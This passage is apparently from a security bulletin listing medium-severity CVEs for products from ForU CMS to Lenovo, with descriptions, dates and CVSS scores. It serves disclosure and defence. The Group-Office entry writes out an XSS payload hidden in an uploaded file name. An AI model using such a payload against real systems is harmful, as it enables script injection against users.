foru_cms -- foru_cmsA vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.2024-01-195.5CVE-2024-0729
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
freefloat -- freefloat_serverA vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability.2024-01-155.3CVE-2024-0548
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
freesshd -- freesshdA vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.2024-01-195.3CVE-2024-0723
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
full_compass_systems -- wic1200A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious javascript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user.2024-01-165.5CVE-2024-0554
cve-coordination@incibe.es
full_compass_systems -- wic1200
 
A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in. This vulnerability is possible due to the lack of propper CSRF token implementation.2024-01-164.6CVE-2024-0555
cve-coordination@incibe.es
github -- enterprise_serverAn attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program.2024-01-166.5CVE-2024-0507
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 12.2 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which an attacker could potentially modify the metadata of signed commits.2024-01-125.3CVE-2023-2030
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab EE affecting all versions starting from 15.3 before 16.5.6, all versions starting from 16.6 before 16.6.4, all versions starting from 16.7 before 16.7.2. The required CODEOWNERS approval could be bypassed by adding changes to a previously approved merge request.2024-01-125.3CVE-2023-4812
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn improper access control vulnerability exists in GitLab Remote Development affecting all versions prior to 16.5.6, 16.6 prior to 16.6.4 and 16.7 prior to 16.7.2. This condition allows an attacker to create a workspace in one group that is associated with an agent from another group.2024-01-125.3CVE-2023-6955
cve@gitlab.com
gl-inet -- gl-ax1800_firmwareAn issue was discovered on GL.iNet devices before version 4.5.0. They assign the same session ID after each user reboot, allowing attackers to share session identifiers between different sessions and bypass authentication or access control measures. Attackers can impersonate legitimate users or perform unauthorized actions. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.2024-01-125.5CVE-2023-50920
cve@mitre.org
gnutls -- gnutlsA vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.2024-01-165.9CVE-2024-0553
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
gnutls -- gnutlsA vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack.2024-01-165.9CVE-2024-0567
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
google -- androidIn video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48340
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48341
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48343
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48344
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48345
security@unisoc.com
google -- androidIn video decoder, there is a possible improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48346
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds read due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48347
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48348
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48349
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48350
security@unisoc.com
google -- androidIn video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed2024-01-185.5CVE-2023-48351
security@unisoc.com
google -- androidIn media service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed2024-01-184.4CVE-2023-48342
security@unisoc.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webuiHCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower has missing or insecure tags that could allow an attacker to execute a malicious script on the user's browser.2024-01-165.6CVE-2023-37522
psirt@hcl.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webuiMissing or insecure tags in the HCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower could allow an attacker to execute a malicious script on the user's browser.2024-01-165.6CVE-2023-37523
psirt@hcl.com
hitachi -- hitachi_device_managerGeneration of Error Message Containing Sensitive Information vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent modules). This issue affects Hitachi Device Manager: before 8.8.5-04.2024-01-165.3CVE-2023-49107
hirt@hitachi.co.jp
hitachi -- hitachi_device_managerMissing Password Field Masking vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent component).This issue affects Hitachi Device Manager: before 8.8.5-04.2024-01-164.6CVE-2023-49106
hirt@hitachi.co.jp
hitachi -- hitachi_tuning_managerIncorrect Default Permissions vulnerability in Hitachi Tuning Manager on Windows (Hitachi Tuning Manager server component) allows local users to read and write specific files.This issue affects Hitachi Tuning Manager: before 8.8.5-04.2024-01-166.6CVE-2023-6457
hirt@hitachi.co.jp
hongdian -- h8951-4g-esp_firmwareUser browser may be forced to execute JavaScript and pass the authentication cookie to the attacker leveraging the XSS vulnerability located at "/gui/terminal_tool.cgi" in the "data" parameter.2024-01-126.1CVE-2023-49258
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareAn XSS attack can be performed by changing the MOTD banner and pointing the victim to the "terminal_tool.cgi" path. It can be used together with the vulnerability CVE-2023-49255.2024-01-126.1CVE-2023-49260
cvd@cert.pl
cvd@cert.pl
huawei -- emuiUnauthorized file access vulnerability in the wallpaper service module. Successful exploitation of this vulnerability may cause features to perform abnormally.2024-01-165.3CVE-2023-52112
psirt@huawei.com
psirt@huawei.com
huaxia-- erpA vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595.2024-01-135.3CVE-2024-0490
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
huaxia-- erpA vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596.2024-01-135.3CVE-2024-0491
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hyperledger-archives -- ursaUrsa is a cryptographic library for use with blockchains. The revocation schema that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model, allowing a malicious holder of a revoked credential to generate a valid Non-Revocation Proof for that credential as part of an AnonCreds presentation. A verifier may verify a credential from a holder as being "not revoked" when in fact, the holder's credential has been revoked. Ursa has moved to end-of-life status and no fix is expected.2024-01-166.5CVE-2024-21670
security-advisories@github.com
hypr -- hypr_workforceImproper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on Windows allows User-Controlled Filename.This issue affects Workforce Access: before 8.7.2024-01-166.4CVE-2023-6335
security@hypr.com
hypr -- workforce_accessImproper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in HYPR Workforce Access on Windows allows Overflow Buffers. This issue affects Workforce Access: before 8.7.2024-01-165.3CVE-2023-6334
security@hypr.com
ibm -- maximo_asset_managementIBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843.2024-01-194.3CVE-2023-47718
psirt@us.ibm.com
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- maximo_spatial_asset_managementIBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.2024-01-195.4CVE-2023-32337
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- openpages_with_watsonIBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.2024-01-196.8CVE-2023-38738
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- sterling_control_centerIBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.2024-01-195.4CVE-2023-35020
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- storage_defender_data_protectIBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.2024-01-196.5CVE-2023-50963
psirt@us.ibm.com
psirt@us.ibm.com
idmsistemas -- sinergia_sinergia_2.0,_and_sinergia_corporativoOmission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1,2,3, etc.2024-01-186.5CVE-2024-0580
cve-coordination@incibe.es
intel -- hid_event_filterInsecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.2024-01-196.7CVE-2023-38541
secure@intel.com
intel -- intel_integrated_sensor_hub_(ish)_driver_for_windows_10_for_intel_nuc_p14e_laptop_element_software_installersIncorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access.2024-01-196.7CVE-2023-29244
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-196.7CVE-2023-28722
secure@intel.com
intermesh -- groupofficeGroup-Office is an enterprise CRM and groupware tool. Affected versions are subject to a vulnerability which is present in the file upload mechanism of Group Office. It allows an attacker to execute arbitrary JavaScript code by embedding it within a file's name. For instance, using a filename such as "><img src=x onerror=prompt('XSS')>.jpg" triggers the vulnerability. When this file is uploaded, the JavaScript code within the filename is executed. This issue has been addressed in version 6.8.29. All users are advised to upgrade. There are no known workarounds for this vulnerability.2024-01-186.5CVE-2024-22418
security-advisories@github.com
security-advisories@github.com
jfinalcms-- jfinalcmsA stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.2024-01-125.4CVE-2024-22492
cve@mitre.org
jfinalcms -- jfinalcmsA stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.2024-01-125.4CVE-2024-22493
cve@mitre.org
jfinalcms-- jfinalcmsA stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML.2024-01-125.4CVE-2024-22494
cve@mitre.org
juniper -- junosAn Improper Check for Unusual or Exceptional Conditions vulnerability in Juniper DHCP Daemon (jdhcpd) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause the jdhcpd to consume all the CPU cycles resulting in a Denial of Service (DoS). On Junos OS devices with forward-snooped-client configured, if an attacker sends a specific DHCP packet to a non-configured interface, this will cause an infinite loop. The DHCP process will have to be restarted to recover the service. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R2.2024-01-126.5CVE-2023-36842
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Handling of Exceptional Conditions vulnerability in the broadband edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an attacker directly connected to the vulnerable system who repeatedly flaps DHCP subscriber sessions to cause a slow memory leak, ultimately leading to a Denial of Service (DoS). Memory can only be recovered by manually restarting bbe-smgd. This issue only occurs if BFD liveness detection for DHCP subscribers is enabled. Systems without BFD liveness detection enabled are not vulnerable to this issue. Indication of the issue can be observed by periodically executing the 'show system processes extensive' command, which will indicate an increase in memory allocation for bbe-smgd. A small amount of memory is leaked every time a DHCP subscriber logs in, which will become visible over time, ultimately leading to memory starvation. user@junos> show system processes extensive | match bbe-smgd 13071 root 24 0 415M 201M select 0 0:41 7.28% bbe-smgd{bbe-smgd} 13071 root 20 0 415M 201M select 1 0:04 0.00% bbe-smgd{bbe-smgd} ... user@junos> show system processes extensive | match bbe-smgd 13071 root 20 0 420M 208M select 0 4:33 0.10% bbe-smgd{bbe-smgd} 13071 root 20 0 420M 208M select 0 0:12 0.00% bbe-smgd{bbe-smgd} ... This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.2024-01-126.5CVE-2024-21587
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If an MX Series device receives PTP packets on an MPC3E that doesn't support PTP this causes a memory leak which will result in unpredictable behavior and ultimately in an MPC crash and restart. To monitor for this issue, please use the following FPC vty level commands: show heap shows an increase in "LAN buffer" utilization and show clksync ptp nbr-upd-info shows non-zero "Pending PFEs" counter. This issue affects Juniper Networks Junos OS on MX Series with MPC3E: * All versions earlier than 20.4R3-S3; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3; * 21.3 versions earlier than 21.3R2-S1, 21.3R3; * 21.4 versions earlier than 21.4R2; * 22.1 versions earlier than 22.1R2.2024-01-126.5CVE-2024-21599
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Neutralization of Equivalent Special Elements vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on PTX Series allows a unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When MPLS packets are meant to be sent to a flexible tunnel interface (FTI) and if the FTI tunnel is down, these will hit the reject NH, due to which the packets get sent to the CPU and cause a host path wedge condition. This will cause the FPC to hang and requires a manual restart to recover. Please note that this issue specifically affects PTX1000, PTX3000, PTX5000 with FPC3, PTX10002-60C, and PTX10008/16 with LC110x. Other PTX Series devices and Line Cards (LC) are not affected. The following log message can be seen when the issue occurs: Cmerror Op Set: Host Loopback: HOST LOOPBACK WEDGE DETECTED IN PATH ID <id> (URI: /fpc/<fpc>/pfe/<pfe>/cm/<cm>/Host_Loopback/<cm>/HOST_LOOPBACK_MAKE_CMERROR_ID[<id>]) This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S8; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R2-S2, 22.1R3; * 22.2 versions earlier than 22.2R2-S1, 22.2R3.2024-01-126.5CVE-2024-21600
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Check for Unusual or Exceptional Conditions vulnerability in the kernel of Juniper Network Junos OS on MX Series allows a network based attacker with low privileges to cause a denial of service. If a scaled configuration for Source class usage (SCU) / destination class usage (DCU) (more than 10 route classes) is present and the SCU/DCU statistics are gathered by executing specific SNMP requests or CLI commands, a 'vmcore' for the RE kernel will be seen which leads to a device restart. Continued exploitation of this issue will lead to a sustained DoS. This issue only affects MX Series devices with MPC10, MPC11 or LC9600, and MX304. No other MX Series devices are affected. This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R2; * 22.3 versions earlier than 22.3R2.2024-01-126.5CVE-2024-21603
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Missing Release of Memory after Effective Lifetime vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause an rpd crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when traffic engineering is enabled for OSPF or ISIS, and a link flaps, a patroot memory leak is observed. This memory leak, over time, will lead to an rpd crash and restart. The memory usage can be monitored using the below command. user@host> show task memory detail | match patroot This issue affects: Juniper Networks Junos OS * All versions earlier than 21.2R3-S3; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-EVO; * 22.1 versions earlier than 22.1R3-EVO; * 22.2 versions earlier than 22.2R3-EVO.2024-01-126.5CVE-2024-21613
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Incomplete Cleanup vulnerability in Nonstop active routing (NSR) component of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause memory leak leading to Denial of Service (DoS). On all Junos OS platforms, when NSR is enabled, a BGP flap will cause memory leak. A manual reboot of the system will restore the services. The memory usage can be monitored using the below commands. user@host> show chassis routing-engine no-forwarding user@host> show system memory | no-more This issue affects: Juniper Networks Junos OS * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S1, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2. This issue does not affect Junos OS versions earlier than 20.4R3-S7.2024-01-126.5CVE-2024-21617
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition. This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. This parallel two instances of replication for the same peer leads to the assert if the BGP session flaps again. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-S1-EVO; * 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO.2024-01-125.9CVE-2024-21585
sirt@juniper.net
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Heap-based Buffer Overflow vulnerability in the Network Services Daemon (NSD) of Juniper Networks Junos OS allows authenticated, low privileged, local attacker to cause a Denial of Service (DoS). On an SRX 5000 Series device, when executing a specific command repeatedly, memory is corrupted, which leads to a Flow Processing Daemon (flowd) crash. The NSD process has to be restarted to restore services. If this issue occurs, it can be checked with the following command: user@host> request security policies check The following log message can also be observed: Error: policies are out of sync for PFE node<number>.fpc<number>.pic<number>. This issue affects: Juniper Networks Junos OS on SRX 5000 Series * All versions earlier than 20.4R3-S6; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S4; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3-S1; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.2024-01-125.5CVE-2024-21594
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Heap-based Buffer Overflow vulnerability in the Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS). If an attacker sends a specific BGP UPDATE message to the device, this will cause a memory overwrite and therefore an RPD crash and restart in the backup Routing Engine (RE). Continued receipt of these packets will cause a sustained Denial of Service (DoS) condition in the backup RE. The primary RE is not impacted by this issue and there is no impact on traffic. This issue only affects devices with NSR enabled. This issue requires an attacker to have an established BGP session to a system affected by the issue. This issue affects both eBGP and iBGP implementations. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.1 versions earlier than 23.1R2; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S4-EVO; * 22.2-EVO versions earlier than 22.2R3-S2-EVO; * 22.3-EVO versions later than 22.3R1-EVO; * 22.4-EVO versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.1-EVO versions earlier than 23.1R2-EVO; * 23.2-EVO versions earlier than 23.2R1-S2-EVO, 23.2R2-EVO.2024-01-125.3CVE-2024-21596
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in the Flow-processing Daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (Dos). On SRX Series devices when two different threads try to simultaneously process a queue which is used for TCP events flowd will crash. One of these threads can not be triggered externally, so the exploitation of this race condition is outside the attackers direct control. Continued exploitation of this issue will lead to a sustained DoS. This issue affects Juniper Networks Junos OS: * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2-S1, 22.4R3. This issue does not affect Juniper Networks Junos OS versions earlier than 21.2R1.2024-01-125.9CVE-2024-21601
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Unsupported Feature in the UI vulnerability in Juniper Networks Junos OS on MX Series and EX9200 Series allows an unauthenticated, network-based attacker to cause partial impact to the integrity of the device. If the "tcp-reset" option is added to the "reject" action in an IPv6 filter which matches on "payload-protocol", packets are permitted instead of rejected. This happens because the payload-protocol match criteria is not supported in the kernel filter causing it to accept all packets without taking any other action. As a fix the payload-protocol match will be treated the same as a "next-header" match to avoid this filter bypass. This issue doesn't affect IPv4 firewall filters. This issue affects Juniper Networks Junos OS on MX Series and EX9200 Series: * All versions earlier than 20.4R3-S7; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2-S2, 22.4R3.2024-01-125.3CVE-2024-21607
sirt@juniper.net
sirt@juniper.net
jupyterlab -- jupyterlabJupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.2024-01-196.5CVE-2024-22420
security-advisories@github.com
security-advisories@github.com
karjasoft -- sami_ HTTP_serverA vulnerability was found in Karjasoft Sami HTTP Server 2.0. It has been classified as problematic. Affected is an unknown function of the component HTTP HEAD Rrequest Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250836.2024-01-185.3CVE-2021-4433
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
keap -- official_opt-in_formsThe Keap Official Opt-in Forms WordPress plugin through 1.0.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).2024-01-154.8CVE-2023-6941
contact@wpscan.com
kishorkhambu -- wp_custom_widget_areaThe WP Custom Widget area WordPress plugin through 1.2.5 does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.2024-01-154.3CVE-2023-6066
contact@wpscan.com
lenovo -- lenovo_app_store_applicationAn incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service.2024-01-195.5CVE-2023-6450
psirt@lenovo.com
lenovo -- tabletA privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands.2024-01-196.8CVE-2023-5080
psirt@lenovo.com
lenovo -- vantageA privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.2024-01-196.3CVE-2023-6044
psirt@lenovo.com
